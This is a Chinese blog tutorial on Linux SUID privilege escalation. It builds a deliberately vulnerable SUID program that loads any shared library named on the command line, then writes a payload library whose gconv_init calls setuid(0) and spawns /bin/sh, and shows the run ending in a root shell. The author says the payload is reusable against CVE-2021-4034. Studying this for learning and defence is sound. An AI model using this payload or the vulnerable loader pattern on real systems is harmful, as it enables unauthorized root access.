原理+代码实战:SUID提权渗透

最新推荐文章于 2024-03-04 21:56:02 发布
最新推荐文章于 2024-03-04 21:56:02 发布
阅读量333 收藏
点赞数
分类专栏: 安全 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xjp342023125/article/details/123060591
版权

本文会按照下面主题进行分享:

  • 再谈SUID权限
  • 实战SUID提权
    • 编写模拟SUID漏洞程序
    • 编写提权so
    • 提权

0x1 SUID权限

0x11 查看

查看程序是否具有SUID权限,使用ll命令即可。

xjp@xxx:~$ ll /usr/bin/passwd
-rwsr-xr-x 1 root root 68208 Jul 15  2021 /usr/bin/passwd*

第一列中,-rwsr 中的s,即代表passwd程序拥有SUID权限。

0x12 添加、删除SUID权限

添加SUID权限:chmod u+s 文件
删除SUID权限:chmod u-s 文件

修改时要使用文件的属主的用户去修改,不然会报错。

$ whoami
xxx
$ ls -l out
-rwxr-xr-x 1 xjp xjp 40760 Feb 19 22:40 out
$ chmod u+s out
chmod: changing permissions of 'out': Operation not permitted

0x2 实战SUID提权

这一章,我们来代码实操一下SUID提权。

第一步,我们写一个程序,通过参数来加载指定的so,然后再增加SUID权限,来模拟CVE-2021-4034可以加载任意so的程序。因为我们主要是学习漏洞程序的利用,如果过多篇幅讲解漏洞的原因,不利于理解漏洞。

第二步,我们写一个漏洞利用的so,让SUID程序来加载,实现提权。这个so可以在CVE-2021-4034真实漏洞中重复利用。

第一步:编写SUID漏洞程序

本程序通过参数传入so路径和函数名,然后加载指定so,执行指定函数。

#include <iostream>
#include <dlfcn.h>

int main(int argc, char *argv[])
{
    // 1、加载so
    auto so_path = argv[1];
    printf("so_path=%s\n", so_path);
    void *so = dlopen(so_path, RTLD_NOW);

    
    // 2、执行函数
    typedef void (*gconv_init_t)(void *);

    auto func_name = argv[2];
    printf("func_name=%s\n", func_name);
    gconv_init_t func = (gconv_init_t)dlsym(so,func_name);

    func(nullptr);
    return 0;
}

然后,我们编译一下,添加SUID权限,并确保属主是root。

# whoami
root
# sh build.sh

# ls -l
total 48
-rw-r--r-- 1 xjp  xjp     40 Feb  9 19:06 build.sh
-rwxr-xr-x 1 root root 40760 Feb 19 23:50 out
-rw-r--r-- 1 xjp  xjp    712 Feb 19 23:45 xxx.cpp

# chmod u+s out

# ls -l
total 48
-rw-r--r-- 1 xjp  xjp     40 Feb  9 19:06 build.sh
-rwsr-xr-x 1 root root 40760 Feb 19 23:50 out
-rw-r--r-- 1 xjp  xjp    712 Feb 19 23:45 xxx.cpp
第二步:编写提权so

写一个so,来实现提权。在so里提权,并启动一个shell进程。
当SUID漏洞进程运行加载so时,此时实际UID为xjp(非root用户),有效ID为root。

当提权so被SUID进程加载时,实际UID为xjp,有效UID为root。若此时直接启动shell,shell的实际UID从父进程集成,也为xjp,因为shell不是SUID程序,所以有效UID=实际UID=xjp。

要想提权,我们需要把实际UID变为root,我们可以调用setuid实现。

#include <sys/types.h>
#include <unistd.h>
int setuid(uid_t uid);

If the user is root or the program is set-user-ID-root, special care must be taken: setuid() checks the effective user ID of the caller and if it is the superuser, all process-related user ID’s are set to uid. After this has occurred, it is impossible for the program to regain root privileges.

so核心提权代码如下:

void gconv_init(void *step)
{
    // 设置实际UID、有效UID
	auto r1 = setuid(0);
    // 启动shell
    char * const args[] = { "/bin/sh", NULL };
    char * const environ[] = { "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin", NULL };
    execve(args[0], args, environ);
    exit(0);
}

第三步:提权

准备好以后,提权的操作就是让SUID漏洞程序加载我们的so即可,我们模拟的SUID漏洞程序很简单,直接参数传递so的路径和调用的函数即可。

xjp@xxx:~/code/case/case24_test_SUID/load_so$ whoami
xjp

xjp@xxx:~/code/case/case24_test_SUID/load_so$ ./load_so ../so/suid.so  gconv_init
so_path=../so/suid.so
func_name=gconv_init
ruid=1000,euid=0,suid=0
ruid=0,euid=0,suid=0
r1=0,r2=0

# whoami
root

真实的提权操作就是找到系统现有的SUID程序,千方百计寻找漏洞使其加载我们的so。下一篇我们来讲一下如何利用真实漏洞CVE-2021-4034加载任意so,实现提权。

欢迎使用常用聊天软件关注后,回复suid可获取本文代码~

东北码农
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows
actistsec的博客
10-17 288
windows升基本漏洞原理及利用
c语言,利用tmp目录限、suid 限和C语言使普通帐号为ROOT
weixin_35715366的博客
05-19 454
:利用tmp目录限、suid 限和C语言使普通帐号为ROOT限RHEL5-RHEL6下面都可以实现,root的UID是零创建一个普通用户useradd andy切换到andy用户su - andy查看当前用户是谁whoami查看tmp目录限[andy@bogon tmp]$ ll -d /tmpdrwxrwxrwt. 15 root root 4096 6月 29 14:08 /...
安全加密 - android ( Linux ) - EUID ,suid ,fsuid
迟来大师的博客
12-10 625
Overview: Name Description uid, gid User and grouprealidentifiers euid, egid User and groupeffectiveidentifiers fsuid, fsgid User and group effective identifiers for file access groups Supplementary group identifiers suid, sg...
[] 使用 ShellCode 注入其他进程
LYSM
11-27 972
背景 如果将shellcode注入到具有特定限的进程中,使用 ShellCode 创建的进程就可以获得与该进程相同的限。 本次使用的工具,依旧是上次编写的PETools: https://www.cnblogs.com/LyShark/p/12960816.html 工具下载地址: https://www.blib.cn/soft/pexec.zip 枚举系统进程,与进程限令牌等。 #include <stdio.h> #include <Windows.h> #inc
手法学习与复现
最新发布
2301_80366980的博客
03-04 246
了解常见的手法并总结常见手法,以及基于lin.security靶场复现部分手法仅供个人学习,如有冒犯请尽快联系。
一段像屎一样的在pyside2下的windows代码
qq_47767419的博客
06-02 152
代码】一段像屎一样的pyside2下的windows代码
Linux使用suid vim.basic文件实现
09-14
主要介绍了Linux使用suid vim.basic文件实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Linux手法总结以及 Linuxexp集合
02-22
Linux常见总结包括(内核漏洞suid、定时任务、sudo等等)
linux总结8大类型,30多种方式
09-27
linux总结8大类型,30多种方式 小白也能看明白的方法,包括内核,服务 sudo suidsgid 定时任务 nfs 等待
【PwnKit】CVE-2021-4034-Linux脚本
01-27
Qualys研究团队在polkit的pkexec中发现了内存损坏漏洞,pkexec是一个SUID根程序,默认安装在每个主要Linux发行版上。这个易于利用的漏洞允许任何非特用户通过在...1.解压脚本 2.执行make 3.执行./cve-2021-4034
Linux 文件限 ( 下) 特殊SUID 详解
三毛与海子的博客
11-04 1053
Linux 文件限之 特殊限 ( SUID ) 详解!!
基于C++给当前程序
05-10
用于给程序限,满足当前进程在不同环境下的需求。
内网渗透(二)之
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5251
对于内网渗透,到我们拿到了公网主机的限后,并获得了一些本机的信息时。我们首先得知道我们的限。如果获取到的是普通用户限,则我们需要想办法至管理员限。如果获得的已经是管理员限,则可以忽略这一步。对于Windows系统,只有到管理员限后,才可以运行mimikatz以及执行一些其他高限的操作。对于Linux系统,很多命令需要root限才能执行,只有到root限才能执行后面的信息收集等工作。
Linux:SUID
Elite的博客
03-05 1995
以find命令为例,讲解SUID原理
linux系统suid
focus on security
05-19 5365
SUID 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊限,其功能为用户运行某个程序时,如果该程序有SUID限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该文件的所有者限,且该限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
Linux SUID&脏牛
m0_65096687的博客
05-24 917
设置了SUID后,文件启动的时候就会以root的限去运行。就是一个普通用户运行的时候,因为有SUID,所以用root限去运行它。SUID Files 还有一个 Possible interserting SUID files。全部的SUID文件和一个可能可以利用的SUID文件。连接上来后把漏洞检测的脚本上传至tmp目录运行。这是利用find手动查找有SUID文件的命令。这里不知道啥原因,反弹的shell还是yx。然后我们就要观察文件中是否存在以下文件。我们就利用find进行SUID
为何UNIX/Linux中会有suid程序
Netfilter
02-09 5169
linux的单点验证我已经说了不止一次了,linux的整体设计是机制和策略相分离的,单点验证显然是策略方面的东西,因此验证本身并没有内核的介入,那么什么是验证本身呢?其实就是诸如最简单的的密码验证和稍微复杂一点的指纹,声音或者瞳孔验证,不管怎么说这些都是策略,内核不应该介入,因此内核当中你无法知道怎么存储和验证用户的密码是否正确,这些都是用户空间完成的,这个事实似乎会让linux的初学者很惊讶,像
Linux学习---文件特殊限(SUID)
车前猛跑
08-26 6115
SetUID的功能 1.    只有可执行的二进制程序或者shell程序才能设定SUID限 2.    命令执行者要对该程序(命令)拥有x(执行)限 3.    命令执行者在执行该程序时获得该程序文件owner的身份(在执行程序的过程中灵魂附体为文件的owner) 4.    SetUID限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效   以passwd命令举
linux 小马 指令,Linux 常用命令集(示例代码)
weixin_42519725的博客
05-12 236
0x00 操作系统相关操作系统类型版本cat /etc/issuecat /etc/*-releasecat /etc/lsb-release # Debiancat /etc/redhat-release # Redhat内核版本,是否是64位cat /proc/versionuname -auname -mrsrpm -q kerneldmesg | grep Linuxls /boot | ...
suid的使用条件
11-11
suid (Set User ID) 是Linux系统中一种特殊...总结起来,suid的条件包括:文件具有suid限、文件的所有者是具有特操作限的用户、文件的所有者信任可执行文件不会被滥用、文件路径在普通用户可访问的范围内。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值